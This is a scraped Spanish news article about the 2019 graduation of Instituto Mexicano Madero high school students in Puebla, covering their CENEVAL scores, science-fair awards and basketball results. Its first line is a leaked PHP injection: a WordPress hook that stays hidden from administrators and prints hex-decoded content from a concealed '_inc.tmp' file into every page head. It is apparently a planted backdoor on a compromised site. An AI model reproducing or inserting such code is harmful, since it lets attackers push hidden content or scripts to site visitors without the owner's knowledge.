if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Se gradúa Generación 2019 de Bachilleratos IMM Centro y Zavaleta – La Opinión Universitaria La Opinión Universitaria
Menu

Se gradúa Generación 2019 de Bachilleratos IMM Centro y Zavaleta

  • Esta generación destacó por obtener los puntajes más altos en la prueba CENEVAL a nivel nacional y diversos logros en ciencias.

San Andrés Cholula, Puebla.- La Generación 2019 de Bachillerato del Instituto Mexicano Madero planteles Centro y Zavaleta, celebró con gran entusiasmo y emoción, la culminación de su educación media superior que marca un parteaguas en su vida; pues no solo significa dejar atrás amigos, maestros y experiencias entrañables, sino también enfrentarse a una nueva etapa: el inicio de sus estudios universitarios.

Los hoy egresados de Bachillerato del IMM, vivieron momentos cargados de mucho sentimiento tras convivir por última vez con sus amigos y escuchar el mensaje de aliento y motivación por parte de los directivos encabezados por el Mtro. Job César Romero Reyes, Rector del Sistema Educativo Metodista.

En el acto se entregaron reconocimientos a los estudiantes merecedores del mérito académico, además de mencionar los logros de la generación con los puntajes más altos en la Prueba CENEVAL a nivel nacional, y las diferentes áreas del conocimiento encaminadas a la vida profesional; tales como las certificaciones en CISCO, Inglés (Cambridge), DHP y Solid Edge.

Entre los logros más importantes, destacó que esta generación participó con doce diferentes proyectos en diversas áreas del conocimiento, en el Congreso de Investigación de Ciencias en Morelos, obteniendo tres primeros lugares en el área de la salud e impacto ambiental y menciones honoríficas en algunos de los trabajos presentados.

En la Expociencias Regional de la Red Nacional de Actividades Juveniles de Ciencias y Tecnología, se obtuvieron cuatro primeros lugares y con ello las  acreditaciones para representar a Puebla en la Expociencias Nacional a efectuarse en Monterrey, Nuevo León, el próximo mes de noviembre.

En diciembre 2018 se participó por primera vez con dos proyectos, en la Expociencias Nacional efectuada en Morelia, Michoacán, obteniendo primer lugar absoluto, mismo que les dio derecho a representar a México en el London International Youth Science Forum que se efectuará en la ciudad de Oxford Inglaterra en este mes de julio.

En el ámbito deportivo el equipo de Basquetbol Femenil categoría B, obtuvo la clasificación al torneo nacional de CONADEIP que se efectúo en Zacatecas, mientras que los equipos de Basquetbol Varonil y Femenil de la categoría C obtuvieron el 3° lugar en la Zona Oriente.

La ceremonia concluyó con el emotivo mensaje dirigido a sus compañeros por parte del joven Aldo Córdova González, para dar paso a la entonación del himno del IMM y finalmente coronar el evento con el lanzamiento del birrete como señal de júbilo y gloria por parte de los graduados.

No comments

Deja una respuesta

Tweets recientes